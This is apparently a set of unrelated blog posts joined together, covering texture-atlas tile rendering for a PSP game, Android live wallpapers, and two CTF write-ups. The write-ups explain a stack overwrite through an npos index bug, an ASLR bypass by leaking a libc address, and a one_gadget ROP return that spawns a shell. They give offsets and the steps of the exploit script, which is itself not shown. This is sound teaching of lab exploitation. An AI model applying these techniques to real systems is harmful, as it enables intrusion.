Here I am presenting what is my experiences when implementing one of the base functionalities in Spelunky-PSP which I currently develop – tile rendering.
Featured in narration, as it makes even that dull essay a little bit joyful.
Back to the basics
Say, you want to draw a single, textured tile in terms of OpenGL pipeline. Having done usual boilerplate, by which I mean creating OpenGL context, loading texture from the filesystem, then uploading to the GPU, obtaining texture ID, binding it to a desired texture slot, writing a dummy shader, compiling, linking vertex and fragment programs, and binding the final product, you finally end up writing the rendering part.
What you need is a frame on which you will stick your texture – so you declare a mesh.
As the tile is a quad, two triangles are pushed to the collection you just created, each of them of three vertices, every described by xy and uv.
Situation is presented by the following image:
You upload the mesh to the GPU, and eventually issue a render call.
Satisfied with results, you go straight for a full tile renderer.
That means, a draw call for a 2D list of 32×24 tiles will be dispatched every frame (your total map size is much bigger, but I assume that you already thought of some optimization and batch only tiles that are in camera viewport). Most of the tiles differ in terms of attached texture, meaning you will have to issue a lot of OpenGL texture binding calls, but you have heard a lot how premature optimization hurts development, so you dismiss the problem.
After briefly writing your proof of concept, you finally run it on the mobile platform you are targeting. Results are puzzling…
It works, but the FPS counter is below expected 60, and that’s not even a full game yet.
One idea comes – how about sorting the batch of tiles to render by the texture attachment ID? That will surely lessen individual texture binding calls.
Again, you apply performance fix to the renderer, and run a profiler.
This time, rendering the very exact scene takes 14 milliseconds. That’s more that 60 FPS!
But what with rendering other entities? Player, mobs, monsters, items, particles?
Desperate for gaining some time buffer for future additions you want to improve your tile renderer.
Optimizing render call
What needs to be achieved is to minimize quantity of texture binding calls, as each of them is considered time-costly.
Sorting did minimize it, but there’s even more effective method: texture atlases.
If you have all your tiles merged into a single texture, you don’t have to issue any individual texture binding calls ever, except one binding call for the tilesheet.
So you end up sticking two tiles together in the image editor of yours, which can be illustrated by the diagram below:
From this example you see the rule for calculating normalized UV for specific tiles.
Before it can be scaled to rendering more than two tiles, few things must be noted:
Merging textures together using an image editor is unpleasant and time-costly
Manual calculating UV’s for each tile is error-prone and time-costly
Imagine storing an animation for a game character in a manually done spritesheet. Suddenly, adding or removing one frame is a massive enterprise, as it involves re-calculating uv’s by hand and cutting the image.
Surely there must be a piece of software that would automatize the process?
Narrator goes off-topic
There’s a lot of free programs that offer such functionality, and as far as my research goes, atlasc is one that has traits I prefer most.
Written in C, it can be built from source (with CMake as a build system), no external dependencies needed, multiplatform, but what’s most important:
Output image dimensions can be configured. Important on platforms where GPU constraints maximum width/height of uploaded textures, i.e PSP supports up to 512×512 pixels.
Outputs image metadata in JSON format. Containing individual image name, width, height, x, y (not normalized) and even mesh with complete index buffer.
Padding and border for each sprite can be configured in terms of pixels.
Scale of each sprite in output image can be configured
Back on the track
Having all this information, you go and happily merge all your tiles using mentioned atlasc, calling:
You modify the game, so it would deserialize outputted JSON in runtime, loading UV’s for each tile, then incorporate them to created mesh.
Your tilesheet looks like this:
Finally, you compile the program, having so far only one texture binding call in its rendering loop, and run it.
As your heartbeat goes up when you see render call time being even smaller than after sorting tiles, while moving camera you discover some problem:
Where did those dark seams between tiles come from?!
There is supposed to be no frames between the question-mark tiles.
Here comes the problem
Initially, you search for source of the problem in texture-loading parts of the code, thinking that texture filtering may cause such artifacts.
As your assets are of pixel-art style, you choose nearest-neighbour filtering, instead of linear one, which interpolates between neighbouring texels leading to blurring those sharp, pixel-art edges.
On the left – nearest neighbour filtering, right – linear filtering. Illustration taken from learnopengl.com which I fully recommend.
That gives a hint – as atlasc outputs UV in pixels, and during serialization they are normalized so to pass them to the mesh, probably normalized value goes out of scope of specified tile, bleeding parts of tile that is neighbouring it. Such events are called pixel bleeding.
In case of this question-mark tile, tile that is neighbouring it is a ladder-tile, which would explain bleeding this dark frame (scroll up to the tilesheet and see it!).
As you precisely examine outputted tilesheet in an image editor, it looks like when you’re passing 16×16 tiles, the texture packer cropps them to be 15×15, with UV’s still being of 16×16!
Pixel bleeding case, but when using linear filtering: https://gamedev.stackexchange.com/questions/46963/how-to-avoid-texture-bleeding-in-a-texture-atlas
If I was to write non-pixel-art renderer and utilize linear filtering, and half-pixel-correction would not work, I would fight pixel-bleeding by scaling tiles up on output (feature offered by atlasc), and, when normalizing coordinates, move UV’s by one pixel inwards the tile.
Some very little parts of the image would be lost, but the damage would be minimized by scaling.
Whether as a mean of utilitarism or pure visual amusement, for a long time live wallpapers felt for me like a niche, stigmatized as battery-draining, or just a triviality that is obscured by the fact that there’s no one I know personally who uses them.
Only recently, stumbling upon this pure diamond I found on Github:
…and refreshing my memories of playing H3:WOG for hours I asked myself a few questions, including:
How exactly do you develop one?
What did people already accomplish, in the means of creativity on this field?
Well, the first answer can be handed right away.
It boils down to creating an application that:
Runs always, even when in background – achieved by creating a Service
Does not create a window on its own, draws on existing surface supplied by the system – achieved by creating a Service, that extends specifically WallpaperService.
Only thing you need to do is to provide implementation for a few methods (i.e run, onTouchEvent, onVisibilityChanged) of Android SDK’s abstract classes WallpaperService and WallpaperService.Engine, and update your manifest file.
This can be done in any tool of your choice, as whether you’re developing in Unity, LibGDX or Android Studio, when deploying to Android you can always override default manifest file and provide additional java files.
Actually, it is that simple that I created a repository where I placed template files for live wallpapers using mentioned technologies:
Once you install such application, it will be visible on your device’s wallpaper browser.
Coming into my second question – If it’s easily accessible, then there must be tons of live wallpapers, for which creativity didn’t simply end on:
Let’s take an image, split it into layers, and add the parallax efect!
And it is correct. There’s a wallpaper that takes a GLSL shader on input and uses it as an output. Another one is an iteration of classic 1970 John Conway’s Game of life. The one after draws Conky-like utility information (RAM, CPU, network usage), yet another opens random Wikipedia article (I would fancy one, that would open CPP-reference, though).
After covering live wallpapers in Android Studio (which I recommend to see, for the sake of having reference to the concepts I will use in this post) I had some understanding of what I want to do in Unity, which was:
Overriding default AndroidManifest.xml that Unity creates
Add one custom Java class, that I will reference from overriden manifest
Add another resource xml file
Additionally, as Unity creates its own Activity when exporting as Android Project, I wanted to reference that activity from my Service declared in Java class, so I could render Unity scene when running as wallpaper.
So I created a clean new Unity project and set-up building to Android.
After quick Googling it looked adding my custom Android-specific code to Unity project will be essentially… Creating Assets/Plugins/Android directory (from root of the project) and copying my files there.
When listing files from that directory:
So what I did was copying res, *.java files from of my Android Studio project, omitting SimpleWallpaperActivity.java, as Unity provides its own Activity.
I also omitted AndroidManifest.xml file – as the one provided by Unity (when exporting as Android project) was a bit bloated and it would be more efficient to just copy very specific content that I needed into Unity’s – I copied whole service tag from my Android Studio project and uses-feature tag.
What was still needed at this point is to reference Unity’s activity to render the scene.
As normally I don’t use Unity I gave up after some time and found out existing wallpaper service that utilizes Unity’s activity by PavelDoGreat:
Creating a live wallpaper in LibGDX is only a step further from creating one with Android Studio’s no-activity template (I suggest having a look at my post covering it, as I will mention concepts that I explain there).
There’s a service, but it does not extend directly from WallpaperService – it does from LibGDX’s AndroidLiveWallpaperService, that in fact goes from WallpaperService.
There’s no simple Activity that extends from Activity – there’s one that extends from AndroidApplication.
There’s AndroidManifest.xml with the very same changes as in case of Android Studio project, and drawing happens in LibGDX’s core project (as LibGDX is multi-platform it generates android/ios/core/desktop/html projects, where core shares common part and other are mostly stubs for launching on specific platform).
Why do we need an Activity and a Service? Android SDK defines them as:
An Activity is a single, focused thing that the user can do. Almost all activities interact with the user, so the Activity class takes care of creating a window for you in which you can place your UI with setContentView(View). (…) The Activity class is an important part of an application’s overall lifecycle, and the way activities are launched and put together is a fundamental part of the platform’s application model. For a detailed perspective on the structure of an Android application and how activities behave, please read the Application Fundamentals and Tasks and Back Stack developer guides.
A Serviceis an application component that can perform long-running
operations in the background, and it doesn’t provide a user interface.
Another application component can start a service, and it continues to run
in the background even if the user switches to another application.
Additionally, a component can bind to a service to interact with it
and even perform interprocess communication (IPC). For example, a service
can handle network transactions, play music, perform file I/O, or interact
with a content provider, all from the background.
So adding a single Activity is required, and Services are optional and needed in special cases.
From Service’s description one can understand, why is it that live wallpapers need them:
they have to do work in background, unlike most of other Android applications or games.
SDK provides special kind of Service – WallpaperService, that once implemented, will do the effort of drawing when visible.
Documentation describes it as:
A wallpaper service is responsible for showing a live wallpaper behind applications that would like to sit on top of it. This service object itself does very little — its only purpose is to generate instances of Engine as needed. Implementing a wallpaper thus involves subclassing from this, subclassing an Engine implementation, and implementing onCreateEngine() to return a new instance of your engine.
Now, knowing what the files we’ve just created are supposed to contain, let’s provide some source.
SimpleWallpaperActivity.java will be as simple, as:
…since we don’t need our wallpaper to contain any UI, when running as an application (yes, it will still be runnable and visible in your device’s apps list, and besides, this activity will be run when user requests wallpaper’s settings, as you will find out later).
Real work is done in SimpleWallpaperService.java:
For simplicity I did not bother to use OpenGL in this example, so you will have to do with draw calls to Android’s Canvas instance.
Instances of NDK’s Handler and Java’s Runner are created to handle drawing outside of overriden methods – handler acts as a queue for draw() commands.
Under src/main/res/xml/ create wallpaper.xml:
The comment I added in the xml itself says everything.
Finally, create AndroidManifest.xml:
There are 3 notable points in this manifest file, that distinguish if from an ordinary application:
uses-feature tag in line 39, that requires a device capable of live wallpapers
service tag starting from line 8, requiring BIND_WALLPAPER permission
meta-data tag, that points to the activity that is run when user requests wallpaper’s settings
You may wonder why would they include the libc (against which stringmaster2 is linked), but we’ll come to this soon.
Now, to see what changed in the source from stringmaster1:
There are two differences:
Code – There’s no spawn_shell function provided this time – we can’t dump its address and overwrite return pointer from the play function with it.
Security measures – Binary is compiled with PIE and stack protector enabled.
PIE stands for Position IndependentExecutable – which relates to PIC – Position Independent Code, since PIE’s are entirely made from PIC.
On how does it work, you may check on Wikipedia, but what does it change in the context of solving this CTF is:
Even if we had the spawn_shell function ready in the binary, this time we couldn’t use its absolute address dumped from the binary like in 1996 task.
We can’t just breakpoint at arbitrarily given address using gdb – though we could fix it by recompiling our local stringmaster2 binary if we really wanted to do some inspection.
If stack protector is enabled, on stack frame, before return address and (optionally) frame pointer, there will be placed another value called stack canary. Since buffer overflow attack to redirect code execution, like in the 1996’s writeup, causes overwriting bytes starting at some variable’s address on the stack to the return pointer, values in between will be overwritten, and thus stack canary will change its value.
Compiler will inject code that checks if that value changed, and if so, it will close program to prevent exploiting.
You can read more on that on the Wikipedia:
But the good news is – those make no obstacles, since like in stringmaster1, we can overwrite arbitrary bytes on the stack frame, so the canary value won’t be overwritten untill we specifically do it, and for the PIC problem – we don’t have the spawn_shell function in the binary anyway, thus we’ll need to return somewhere else – but where will we?
Return to libc
Return to libc (r2libc) technique bases on replacing return pointer’s value with an address from the C library – it may be execve function, the same which was called in spawn_shell in stringmaster1, it may be any other function or even a specific line of code within those functions!
Calling execve this way would involve overwriting:
Return pointer, previously storing an address of a line in main function, to which call from play will return.
It would be overwritten with an address of execve function (8 bytes).
Address after that, would need to point to a literal with “/bin/bash” (where would we find it – later) – 8 bytes.
Again, pointer to a literal with “/bin/bash” – 8 bytes.
Pointer to NULL, which would be 8 zeroed bytes.
Again, pointer to NULL – 8 zeroed bytes.
Where can we find execv address?
Where can we wind the “/bin/bash” literal I mentioned?
It’s in the libc, just like the execv, but how would it manage to get there?
grep -rni . -e “/bin/sh” causes recursive searching of “/bin/sh” in current path.
As you see, there are some execve calls involving const char literals “/bin/sh” passed as an argument, which means, that those literals will be eventually stored in the .data section of libc .so file, with pointers to them pushed on the stack when one of those specific call happens.
Now, as we know how to manually craft function call to execve with “/bin/bash” as an argument – I will tell you why we won’t do it in this case – though what we’ve learned will come handy, since what we’ll really do is very similar.
See, when last time we did stringmaster1, swapping bytes to make return pointer store value to spawn_shell was very unstable – program crashed at random, and we only tried to swap 8 bytes!
Swapping all bytes from our manually crafted call stack would involve swapping 40 bytes, not mentioning, we would need to have those 40, mostly different values, somewhere on the leaked stack (and that involves a lot of luck).
What if there would be a way to jump directly to the place where execve(“/bin/bash”) is called in the libc (already with the argument on the stack!) just as we’ve seen in libc sources, without planting function arguments?
Return Oriented Progamming
ROP is the technique I’ve just suggested. Find some place in the existing code that you want to execute, get its address and jump to it. Those places that can be jumped to are called ROP gadgets.
We won’t waste time on finding it manually since there is already a tool specifically for finding execve gadget (though, I’ll make another post about this later), it’s called one_gadget and can be downloaded here: https://github.com/david942j/one_gadget
After installation, we’ll call one_gadget with path to our libc as an argument:
That’s it, we’ve been provided with 3 variants, where registers have different values when calling. We’ll use the first once, but it makes us no difference which one we call.
Return to the plan
So we could use the same python exploit we used before, but with another value of return pointer to substitute (this time the gadget instead of spawn_shell), could we?
Er, no. There’s one last thing I didn’t mention – ASLR, which stands for Address Space Layout Randomization.
The gadget’s address we just took from the libc is an absolute address. It’s an address that takes into account only distance from the beginning of the .so file.
It would be valid only if we added the base libc address to it (the address under which libc is loaded in the system), and the base address changes due to ASLR every time we run the application!
See how the base address changes (ldd runs the program and prints addresses in which libraries are loaded):
As an experiment, let’s temporarily disable ASLR and invoke ldd once again:
As you can see, this time addresses don’t change – how easy it would be to exploit without ASLR! We could just take this permanent base libc address, add absolute address of our gadget and run python script that would change return pointer value.
So in what manner do we defeat ASLR?
Let’s have a detailed look on what’s on stack of a very simple program:
I’ve printed first 20 addresses on the stack when I was breakpointed in the main function. As you see, we have plenty of addresses that reffer to the C library!
First one, __libc_csu_init is the frame pointer in our stack frame, second one, <__libc_start_main+231> is the return pointer – the 231 part means that it points to 231-st byte after the beginning of this function. So we return into a libc function, that called our main before, when bootstrapping the process!
If you want some details on why those addresses are here (not of much relevance for further solving of this task), you can see the answer I gave on Stack Overflow:
At which position will we find <__libc_start_main+231> in stringmaster2’s leak?
At the same we used before, 18-th octet of leaked data is the return pointer, and program tries to return to the <__libc_start_main+231>.
The final algorithm is the same as in stringmaster1, but adding a step before replacing return pointer, because we need to calculate the value with which we will replace:
Get integer value from 8 bytes starting at (17 * 8) index of leaked bytes array
Substract 0x21B97 from that value and assign it to libc_base
Bytes for further replacing are [libc_base + gadget_addr]
That’s how ASLR can be defeated – by leaking some address from libc that we know what it points to (<__libc_start_main+231> in this case).
This time I moved the part which sends commands to Client class, but in its essence, code is almost like stringmaster1, besides calculating libc-base.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
So far, it was the most complex task, since it involved:
Knowing how libc bootstraps processes – that their flow starts not in your main function, but in _libc_start_main, then it redirects flow to your main, and finally returns to <__libc_start_main+231> in the end, when your main return.
You can read more on that on this excellent blog: http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html
Knowing, that because of ASLR, you can’t just use some address extracted from libc, without knowing the base at which libc is loaded at this current process instance.
Knowing about ROP gadgets, since crafting a call stack for execve by yourself is too unstable to work with given commands (swapping/replacing bytes on stack).
If you’re curious how it is, that one process can use libc at different address every instance, but its code itself does not change – read about Global Offset Table and Procedure Linkage Table:
As this task is one category higher than the last one (very easy -> easy), I wrote a separate blog post about std::string, as some knowledge about it would be required for this task and I assume you’ve already read it.
After cd-ing to this task’s distrib directory we’ll see a binary and cpp source code, from which we know, that this binary already provides spawn_shell function, though does not call it anywhere, and consists of 2 other functions – play() and main():
As play function contains much boilerplate, I’ll omit the noise and post only the most important code from which we’ll deduce a vector of attack:
Before I tell you how to exploit a vulnerability that is visible on this picture, let’s first run the binary to show what it prints:
As you see, it’s a simple game of making two strings equal by gradually replacing/swapping characters.
Now, going back to the code from the image before – you may have already noticed, that the “replace” command does not provide any sanitization of returned index! If you input a character that does not exist in the string the program searches, it’s going to return std::string::npos, which is 8 bytes, 0xFFFFFFFFFFFFFFFF.
That means, that if we try to access
[string’s data pointer address] + [0xFFFFFFFFFFFFFFFF]
we’re going to end up with…
[string’s data pointer address] – minus one byte!
If you don’t get it, I explained pointer overflow in the post linked above.
As a consequence, we’re going to end up writing in string’s length field’s last byte. That will make string’s length to hold ridiculously high value, and allow us to print more information with “print” command:
You may wonder – what use do I have from this seemingly random data?
Vector of attack – return pointer overflow
This data provides us 2 important facts:
position of return pointer from play function;
we’ll inject address of spawn_shell there.
position and value of a set of bytes that we could use with “swap” command;
we’ll use them to swap bytes of play’s return pointer
Of course, we won’t do this manually as it’s too cumbersome. We’ll write a python script for that, but before, we’ll need 2 another facts that gdb’s going to provide:
address of instruction that comes just after call to play function in main function; it’s going to be the value of return pointer in play function – from that fact we’ll know which bytes to swap to make it return to spawn_shell instead
First one is a simple matter of:
spawn_shell’s address is 0x00000000004011a7 (left padded to 16 bytes since it’s x86_64 platform I’m working on).
In the second one, we’ve got to disassemble main and find the call to the play function:
As you see, return pointer value’s going to be 0x000000000040246d.
Now we have all the information we need; it’s time for the python script.
I won’t comment about it much since it’s self-commenting, but the algorithm is:
Connect to program (it’s running on a Docker image on port 22224)
Wait untill it sends the command prompt text (and do it every sending of some command)
Send ‘replace X a’ – X since there are no upper case characters in those strings so it’s always safe to pick one of those – ‘a’ since the program seemingly doesn’t crush that much with replacing with a’s – but it’s only arbitrary taken character, any other will do.
Send ‘print’ request to get info of what is after string’s local data pointer
Find index of return pointer (0x40246d) in what ‘print’ returned – I found it manually by printing hex of returned data to console before writing the rest of the script and just hardcoded it, but one can easily code searching for.
Find indexes of 0x40, 0x11, 0xa7 bytes. There’s a chance they will be somewhere in program’s memory, there’s a chance they won’t. If not, just restart the exploit, since the stringmaster1 binary is re-spawned every connection.
Replace return pointer bytes with bytes from indexes we’ve found in the last step
Print ‘exit’ to make it return to spawn_shell
Send ‘cat flag.txt’
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
Docker was convenient, but I’ll try to implement hacking the binary without docker; hooking python script to stdout, without sockets, just for further experiments.
Also, my python skills need some improvement.